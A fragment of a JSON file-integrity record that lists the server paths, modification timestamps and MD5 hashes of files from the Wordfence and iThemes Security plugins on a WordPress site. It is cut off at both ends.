413928dc6e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/site-cleaning-high-sense.php\":{\"d\":1544704187,\"h\":\"8773544407b77ab8a4fcd2a7e96da216\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-diskSpace.php\":{\"d\":1544704187,\"h\":\"e3e5f2cc1afac12e2a3ac3ae882bbe31\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/issue-configReadable.php\":{\"d\":1544704187,\"h\":\"feef8020befb9ceaefe58ef251b9864c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/scanner\\/options-group-general.php\":{\"d\":1544704187,\"h\":\"794285236119e1e85a627028519f86fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/options\\/option-toggled-segmented.php\":{\"d\":1544704187,\"h\":\"42c87c7373476f31bae5ec0703b21778\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/options\\/option-textarea.php\":{\"d\":1544704187,\"h\":\"41630e7f0c5b44f1974f2b2e66e6191a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/options\\/option-toggled.php\":{\"d\":1544704187,\"h\":\"5d4b7259d0d006b31dcd0577cd4201b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/options\\/option-label.php\":{\"d\":1544704187,\"h\":\"0796b0cb60f19a7f4cf49602936766e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/options\\/option-text.php\":{\"d\":1544704187,\"h\":\"7dd6e0ff4bcb0c6d8377b64b3520494f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/options\\/block-all-options-controls.php\":{\"d\":1544704187,\"h\":\"393549ff1842197f848a2261017fe3cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/options\\/option-toggled-select.php\":{\"d\":1544704187,\"h\":\"1db222c0702b10bb4e19c56feba42b54\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/options\\/options-title.php\":{\"d\":1544704187,\"h\":\"1e45dd30f3142201ff8592af23131c93\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/options\\/option-toggled-boolean-switch.php\":{\"d\":1544704187,\"h\":\"2c2b9ca3fe5b03520419b58cc5d68802\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/options\\/option-token.php\":{\"d\":1544704187,\"h\":\"d957e55937db166f09fb5fdcd380d93f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/options\\/option-toggled-multiple.php\":{\"d\":1544704187,\"h\":\"852130fe84e0c04bdc8335e27b504428\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/options\\/option-select.php\":{\"d\":1544704187,\"h\":\"71a9cc35db438e94e301ec83ce26edac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/options\\/option-toggled-textarea.php\":{\"d\":1544704187,\"h\":\"eb88a3f44509d3cb7862482497c27411\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/options\\/block-controls.php\":{\"d\":1544704187,\"h\":\"af382035fc552cee046598a10aae3428\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/options\\/option-toggled-sub.php\":{\"d\":1544704187,\"h\":\"b2941a28e1617c011cbfb9d9ce915d78\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/options\\/option-switch.php\":{\"d\":1544704187,\"h\":\"6db369d245b73e57a563159c5a616967\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/waf\\/status-tooltip-learning-mode.php\":{\"d\":1544704187,\"h\":\"f8d98f386c081fbca19f05fdb425c2e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/waf\\/options-group-advanced-firewall.php\":{\"d\":1544704187,\"h\":\"fc49ee074eeaf07ef88a64f746a765a7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/waf\\/waf-uninstall-success.php\":{\"d\":1544704187,\"h\":\"8df9c0ad7f899bbba1a51cbd2a736632\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/waf\\/option-rate-limit.php\":{\"d\":1544704187,\"h\":\"e322c483457a5a1b83c51f4753cb2030\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/waf\\/options-group-whitelisted.php\":{\"d\":1544704187,\"h\":\"5669ab014bf9dbb976e97f3f17c19df5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/waf\\/options-group-brute-force.php\":{\"d\":1544704187,\"h\":\"1a18f3f9d9bbc21f44bc3bd1a963dbba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/waf\\/waf-install-manual.php\":{\"d\":1544704187,\"h\":\"24f278fdb01c7e291591ab875bda9c7a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/waf\\/firewall-status.php\":{\"d\":1544704187,\"h\":\"b46c7700693735c4f18ae6830647f493\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/waf\\/waf-modal-wrapper.php\":{\"d\":1544704187,\"h\":\"c56eceb35505c7a9963750bd4689a8f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/waf\\/waf-uninstall.php\":{\"d\":1544704187,\"h\":\"a2d80534f56ebd9311b65a3d947420d4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/waf\\/waf-install-success.php\":{\"d\":1544704187,\"h\":\"ea7b72861d84a7a3625e95e9db3f1697\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/waf\\/option-whitelist.php\":{\"d\":1544704187,\"h\":\"12cea8efdc2d08cbafa6b13383fc77c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/waf\\/options-group-basic-firewall.php\":{\"d\":1544704187,\"h\":\"3033062a36813614192df14655882ec8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/waf\\/waf-install.php\":{\"d\":1544704187,\"h\":\"73abcae763007c0ee531dafa4a985228\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/waf\\/debug.php\":{\"d\":1544704187,\"h\":\"d8464d019ffd40b069b18c2d4d9b8dba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/waf\\/options-group-rate-limiting.php\":{\"d\":1544704187,\"h\":\"ec0cc881295c51e571398c46cdfce023\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/waf\\/option-rules.php\":{\"d\":1544704187,\"h\":\"e5afd3755c1f076d3606b0b792b35b25\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/blocking\\/country-block-map.php\":{\"d\":1544704187,\"h\":\"a1759cc1794746a11e2c7b968c58c17a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/blocking\\/option-bypass-redirect.php\":{\"d\":1544704187,\"h\":\"bfdf229ea13579972022cf0f12278a66\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/blocking\\/country-modal.php\":{\"d\":1544704187,\"h\":\"2d055e4183903f1da4061df6b69b1d1b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/blocking\\/options-group-advanced-country.php\":{\"d\":1544704187,\"h\":\"07e49caecd60530375079ca5389090ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/blocking\\/option-bypass-cookie.php\":{\"d\":1544704187,\"h\":\"50416630092fa1a7e020c22877c33158\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/blocking\\/blocking-status.php\":{\"d\":1544704187,\"h\":\"c9cbae5fc1ec18cdf5aec6e4586becd0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/blocking\\/blocking-create.php\":{\"d\":1544704187,\"h\":\"fab08e34a74a91a950d0a9f073c442fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/blocking\\/block-list.php\":{\"d\":1544704187,\"h\":\"dfd9f14cc95950cdba4b8bd30a8f65d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/marketing\\/rightrail.php\":{\"d\":1544704187,\"h\":\"5b8b90f5ac2e16b29352b237fcd7e9cb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/views\\/.htaccess\":{\"d\":1544704187,\"h\":\"a34522784bcaea0e7bc738f6645312b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/jquery.colorbox.1543941426.js\":{\"d\":1544704187,\"h\":\"284f88302505368c1039f365a733e56a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/Chart.bundle.min.1543941426.js\":{\"d\":1544704187,\"h\":\"baf1f3355d948a64eec0a0fb648066dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/admin.liveTraffic.1543941426.js\":{\"d\":1544704187,\"h\":\"410ec7ae9c316a906a557baaf68c732d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/wfdropdown.1543941426.js\":{\"d\":1544704187,\"h\":\"8016bdd1e1d872700bf4eef763271abe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/jquery.tools.min.1543941426.js\":{\"d\":1544704187,\"h\":\"d13a0e2db7e10645d5a078a124e0b842\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/jquery-ui-timepicker-addon.1543941426.js\":{\"d\":1544704187,\"h\":\"38399d22ebee7a7af8c256762aced85d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/jquery.qrcode.min.1543941426.js\":{\"d\":1544704187,\"h\":\"05f0b1d7d4b9b0b4975870606d650e3c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/admin.ajaxWatcher.1543941426.js\":{\"d\":1544704187,\"h\":\"a3f072d8172d632f236d7fbea04fe29b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/wfselect2.min.1543941426.js\":{\"d\":1544704187,\"h\":\"4a9e9dbef69dfc12a521902ea1e7d769\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/wfpopover.1543941426.js\":{\"d\":1544704187,\"h\":\"3be30c266dad0b41c4686c4d06505a58\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/jquery.colorbox-min.1543941426.js\":{\"d\":1544704187,\"h\":\"5935b13de7f7cc71ee03fe29908f96c8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/wfglobal.1543941426.js\":{\"d\":1544704187,\"h\":\"f2066093d3b1000dd897d78b8256fe4b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/knockout-3.3.0.1543941426.js\":{\"d\":1544704187,\"h\":\"a2d65ff1c1198342386c635ee984d207\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/jquery.dataTables.min.1543941426.js\":{\"d\":1544704187,\"h\":\"0e123c5cc2f4201c8305cd9507b768a8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/admin.1543941426.js\":{\"d\":1544704187,\"h\":\"a785dad03d48f2a1842eba48f03480ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/jquery.tmpl.min.1543941426.js\":{\"d\":1544704187,\"h\":\"805c7dc322a386178b37dab79295445a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/perf.1543941426.js\":{\"d\":1544704187,\"h\":\"7551f722ca7746f7dce11752141f4070\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/date.1543941426.js\":{\"d\":1544704187,\"h\":\"7f8cf4d56a9dbd50be4552d05faf63c0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/js\\/wfdashboard.1543941426.js\":{\"d\":1544704187,\"h\":\"a9a3d4bdac509facb0cd60df1d7b69b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/waf\\/wfWAFGeoIP2.php\":{\"d\":1544704187,\"h\":\"dd87ad289e302c6de689475f59810f33\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/waf\\/.htaccess\":{\"d\":1544704187,\"h\":\"a34522784bcaea0e7bc738f6645312b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/waf\\/bootstrap.php\":{\"d\":1544704187,\"h\":\"de9bbfb5c2b6632034868f70b5b23675\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/waf\\/wfWAFUserIPRange.php\":{\"d\":1544704187,\"h\":\"c079c1464894c32727196ecfd2de8e94\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/waf\\/wfWAFIPBlocksController.php\":{\"d\":1544704187,\"h\":\"6da30ab2667c82bfa90460bf9e9919d8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/models\\/common\\/wfTab.php\":{\"d\":1544704187,\"h\":\"3206f60254d47d9a4857273c137d085c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/models\\/common\\/wfGeoIP2.php\":{\"d\":1544704187,\"h\":\"d517594a73406a8c10aaa672b46a746d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/models\\/block\\/wfRateLimit.php\":{\"d\":1544704187,\"h\":\"be85dd57a97c43c4d6d3c78e57c9d950\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/models\\/block\\/wfBlock.php\":{\"d\":1544704187,\"h\":\"b2aac07aa4966e18b1f4b88e4b5fd51b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/models\\/page\\/wfPage.php\":{\"d\":1544704187,\"h\":\"0b5ab14b6767e68f09d8f4214f3df2d4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/models\\/firewall\\/wfFirewall.php\":{\"d\":1544704187,\"h\":\"76e48799046ed0ead87691251cf9ee70\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/models\\/scanner\\/wfScanner.php\":{\"d\":1544704187,\"h\":\"106b6e60d3ba93487b7198e4f01107f8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/models\\/.htaccess\":{\"d\":1544704187,\"h\":\"a34522784bcaea0e7bc738f6645312b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/fonts\\/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff\":{\"d\":1544704187,\"h\":\"db2cca3b4c8a27b31607b4646565b49f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/fonts\\/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff\":{\"d\":1544704187,\"h\":\"da6a4937389f7b92b71c06720bc950ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/fonts\\/fontawesome-webfont.woff\":{\"d\":1544704187,\"h\":\"fee66e712a8a08eef5805a46892932ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/fonts\\/roboto-KFOmCnqEu92Fr1Mu4mxMKTU1Kg.woff\":{\"d\":1544704187,\"h\":\"4024c67147b9326b35070824a1867a94\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/fonts\\/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff\":{\"d\":1544704187,\"h\":\"6079002378c473fa47ec4ab6d674b0e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/fonts\\/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff\":{\"d\":1544704187,\"h\":\"6d7047ccd1d76142fe9a4e583e9cf328\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/fonts\\/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff\":{\"d\":1544704187,\"h\":\"729abcc2f819c1611516a961e512ee69\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/fonts\\/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff\":{\"d\":1544704187,\"h\":\"6efb6aaec0b9f430f6a3e21cfbe39b39\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/fonts\\/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff\":{\"d\":1544704187,\"h\":\"2b45d2594815cded8f3c59504b3db053\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/fonts\\/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff\":{\"d\":1544704187,\"h\":\"a5d401f5ecd87b57fc3705683e97adaf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/fonts\\/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff\":{\"d\":1544704187,\"h\":\"186f4c46ca9234e5bc05d569ee0e2d2d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/fonts\\/ionicons.woff\":{\"d\":1544704187,\"h\":\"05acfdb568b3df49ad31355b19495d4a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/wordfence.php\":{\"d\":1544704184,\"h\":\"5dee5bacac126652f354ff4d26dd0214\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/index.php\":{\"d\":1544704187,\"h\":\"32c101e865d8c2c2aaadeb5cc6c16f67\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordfence\\/readme.txt\":{\"d\":1544704187,\"h\":\"2e3e4beab437984bfbeb814dafeb3783\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/fonts\\/ithemes-icons.ttf\":{\"d\":1545735239,\"h\":\"3638c3971bed7ade6547754a896668e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/fonts\\/ithemes-icons.woff\":{\"d\":1545735239,\"h\":\"1849448daea1ad4ba5d53cc439b2e773\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/fonts\\/ithemes-icons.eot\":{\"d\":1545735239,\"h\":\"806a53b830f29c4e1a92398a5233dbce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/fonts\\/index.php\":{\"d\":1545735239,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/init.php\":{\"d\":1545735239,\"h\":\"daf9ccc98e1dd336debfd9523d34f9ce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/icon-fonts.css\":{\"d\":1545735239,\"h\":\"07a63c161dc5e944dd1450699dd47ebb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/index.php\":{\"d\":1545735239,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/history.txt\":{\"d\":1545735239,\"h\":\"a1314384f4d9242b5ffef5a365473efa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/load.php\":{\"d\":1545735239,\"h\":\"7a36ea8313f8bdbd123c037f75b0e3e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/index.php\":{\"d\":1545735239,\"h\":\"56d4439768678cd301f9a9f140f9440b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/css\\/style.css\":{\"d\":1545735239,\"h\":\"e2a3cf98675abca670ebb9e2dbd426a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/css\\/index.php\":{\"d\":1545735239,\"h\":\"67442c5615eba73d105c0715c6620850\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/js\\/script.js\":{\"d\":1545735239,\"h\":\"d43b87a8940fdb9e1aaebf00309e7551\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/js\\/settings.js\":{\"d\":1545735239,\"h\":\"d641663a8d9d87343d51b79a06d04084\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/js\\/util.js\":{\"d\":1545735239,\"h\":\"e3e8b5b493788b8bb14c33f3db3dc9d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/js\\/index.php\":{\"d\":1545735239,\"h\":\"67442c5615eba73d105c0715c6620850\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/js\\/debug.js\":{\"d\":1545735239,\"h\":\"757a161cd1a0657cc3401042d3b1db6b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/js\\/logs.js\":{\"d\":1545735239,\"h\":\"ca09b6a8322118de2cd75bfb8e9fd658\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/logs-list-table.php\":{\"d\":1545735239,\"h\":\"866f3b1062e070110c2ff00ee5d5b69d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/page-settings.php\":{\"d\":1545735239,\"h\":\"32b5ebeafa1576adc0b554f8b86aec1f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/init.php\":{\"d\":1545735239,\"h\":\"262bce31796699aef9a3946d42052f0d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/module-settings.php\":{\"d\":1545735239,\"h\":\"1c5b4e4b3d02802f656fbaacfb3c8c20\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/page-debug.php\":{\"d\":1545735239,\"h\":\"3a6828e70cbdba92b6f930a96feac443\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/page-go-pro.php\":{\"d\":1545735239,\"h\":\"09e7587c3929aa53201bf7f0c62b1c7e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/sidebar-widget.php\":{\"d\":1545735239,\"h\":\"168ff582a863841c2410749ec954f737\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/page-logs.php\":{\"d\":1545735239,\"h\":\"1b0b0d86e7fece237ecc4c9e15140861\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/index.php\":{\"d\":1545735239,\"h\":\"67442c5615eba73d105c0715c6620850\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/admin-pages\\/page-security-check.php\":{\"d\":1545735239,\"h\":\"e2debdd7a0b1c2154239264bef6f683f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/geolocation\\/interface-itsec-geolocator.php\":{\"d\":1545735239,\"h\":\"018d3daf3d9d0f30b40c1592830270fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/geolocation\\/index.php\":{\"d\":1545735239,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/geolocation\\/class-itsec-geolocator-page-cache.php\":{\"d\":1545735239,\"h\":\"4add7d0d68f35fafe052e633a2e8bd97\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/geolocation\\/class-itsec-geolocator-chain.php\":{\"d\":1545735239,\"h\":\"b57ff90d4b63818b7cd2cff8d43369c6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/includes\\/index.php\":{\"d\":1545735239,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/includes\\/function.login-header.php\":{\"d\":1545735239,\"h\":\"bf17fbb4dc1c4ab